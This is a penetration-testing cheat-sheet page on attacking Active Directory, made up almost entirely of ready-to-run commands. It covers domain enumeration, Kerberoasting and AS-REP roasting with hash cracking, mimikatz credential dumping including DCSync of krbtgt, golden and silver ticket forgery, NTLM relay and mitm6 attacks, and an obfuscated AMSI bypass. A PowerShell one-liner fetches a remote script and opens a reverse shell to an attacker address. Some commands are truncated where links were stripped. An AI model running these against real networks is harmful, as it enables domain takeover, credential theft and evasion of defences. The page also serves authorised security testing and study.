Pentest Book


Basic Active Directory terms


Agent represented by a user account.
  • Regular user accounts (used by employees or for specific task as backups)
  • Computer accounts (ends with $). Computers in AD are a users subclass.


  • Identified by SPN which indicates the service name and class, the owner and the host computer.
  • Is executed in a computer (the host of the service) as a process.
  • Services (as any process) are running in the context of a user account, with the privileges and permissions of that user.
  • The SPN’s of the services owned by an user are stored in the attribute ServicePrincipalName of that account.
  • Usually Domain Admin or similar role is required to modify the SPN’s of a user.


# Anonymous Credential LDAP Dumping:
ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)
# Impacket (Must have valid credentials) -all -dc-ip
# Impacket
/usr/share/doc/python3-impacket/examples/ username:[email protected]
# Windapsearch:
python3 -d host.domain -u domain\\ldapbind -p PASSWORD -U
# Go version
cme smb IP -u '' -p '' --users --shares
# BloodHound
Import-Module .\sharphound.ps1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
# (no shell needed) remote, ldap auth
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <> -c all
# BloodHound Cheatsheet
# Bloodhound raw queries
# Bloodhound complements
# Get BH data from LDAP
# Rubeus
## ASREProasting:
Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
## Kerberoasting:
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
## Pass the key (PTK):
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Using the ticket on a Windows target:
Rubeus.exe ptt /ticket:<ticket_kirbi_file>
# Password Spraying tool
# Kerberoast
# Powerview
# AD Cheatsheets
# References:

Common vulns

# Users having rights to add computers to domain
add-computer –domainname org.local -Credential ORG\john -restart –force
# AdminCount attribute set on common users
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
Import-Module ActiveDirectory
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount
# High number of users in privileged groups
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
- Linux:
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I -U "john"%"pass123"
# Service accounts being members of Domain Admins
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
# Excessive privileges allowing for shadow Domain Admins
# Service accounts vulnerable to Kerberoasting -request
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt
# Users with non-expiring passwords
python -u\john -p pass123 -d ';'
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }
# Users with password not required
python -u\john -p pass123 -d ';'
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -Filter {UserAccountControl -band 0x0020}
# Storing passwords using reversible encryption
mimikatz # lsadump::dcsync / /user:poorjohn
# Storing passwords using LM hashes
- In NTDS.dit
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt
# Service accounts vulnerable to AS-REP roasting -usersfile userlist.txt -format hashcat -no-pass -request -format hashcat
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
- PS
Import-Module ActiveDirectory
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
# Weak domain password policy
net accounts /domain
polenum --username john --password pass123 --domain
enum4linux -P -u john -p pass123 -w dom.local
# Inactive domain accounts
python -u\john -p pass123 -d ';'
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'
# Privileged users with password reset overdue
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
# Users with a weak password
$a = [adsisearcher](&(objectCategory=person)(objectClass=user))
$a.PropertiesToLoad.add(“samaccountname”) | out-null
$a.PageSize = 1
$a.FindAll() | % { echo $ } > users.txt
Import-Module ./adlogin.ps1
adlogin users.txt password123
# Credentials in SYSVOL and Group Policy Preferences (GPP)
findstr /s /n /i /p password \\\sysvol\\*
mount.cifs -o,username=john,password="[email protected]" // /mnt
grep -ir 'password' /mnt

Quick tips

# Amsi bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Powershell Execution policy Bypass
powershell -ep bypass
# To input the output of the first command into second command use this powershell technique
# %{} is an alias for ForEach-Object{}
# ?{} is an alias for Where-Object{}
# $_ is variable
<First command> | %{<Second command> -<argument> $_}
# To filter out an object type we can use this technique with pipe.
?{$_.<object> -eq '<value>’'}
# Find local admin access
# Get Domain sid
Arguments -Domain “domain name”
# Get DC
Arguments -Domain “domain name”
# Get users in current domain
Arguments -UserName “username”
# Get user properties
Arguments -Properties pwdlastset
# Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm ”built”
# Get all computers
Get-NetComputer -FullData
Many arguments -OperatingSystem -Ping -FullData
# Get groups
Arguments -FullData -Domain
# Get members of a particular group
Get-NetGroupMember -GroupName "Domain Admins"
# Group Policies
Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup
# Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName
# Get OUs
Get-NetOU -FullData Get-NetGPO -GPOname
# Mapping forest
Get-NetForest -Verbose
Get-NetForestDomain -Verbose
# Mapping trust
Arguments -Domain
Get-NetForestDomain -Verbose | Get-NetDomainTrust
# Finding Constrained Delegation
Get-DomainUser -TrustedToAuth (Poweview Dev.)
# Finding UnConstrained Delegation
Get-NetComputer -UnConstrained
# Get ACLs
Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
# Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
# Reverse Shell
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
powershell.exe iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443
# Make ntlm ps-session
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'
# Dump creds
Invoke-Mimikatz -Command ‘“lsadump::lsa /patch”’
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"'
(dcsync requires 3 permission )
# Tickets
Inject ticket:-
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi tkt>"'
Export Tickets:-
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
# Golden tkt
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Silver tkt
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'
# TGT tkt
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>
# TGS tkt
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>

Relay attacks flow

I’m bringing relaying back: A comprehensive guide on relaying anno 2022 - TrustedSec


# First just listen
sudo responder -I eth0 -A
# Check SMB signing disabled
crackmapexec smb --gen-relay-list smb_sign_disabled.txt

Basic attack A

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt
# Then start responder in attack mode
responder -rdP -I eth0
# Cracking NTLMv2
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force

Basic attack B (socks proxy)

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt -smb2support -socks
# Edit proxychains4.conf to:
socks4 1080
# Run secretsdump
proxychains dcname\user:[email protected]
# Even smbclient
proxychains dcname\user:[email protected]

LDAP Enum -t ldap:// -smb2support

IPv6 DNS Takeover via Mitm6

git clone
pip install mitm6
mitm6 -d
# During before step, in other terminal run -6 -t ldaps:// -wh -l dir

LDAP complete guide

LDAPSearch Reference

AD Mindmap

DACL mindmap

Export as PDF
Copy link
Edit on GitHub
Basic Active Directory terms
Common vulns
Quick tips
Relay attacks flow
Basic attack A
Basic attack B (socks proxy)
IPv6 DNS Takeover via Mitm6
LDAP complete guide
AD Mindmap
DACL mindmap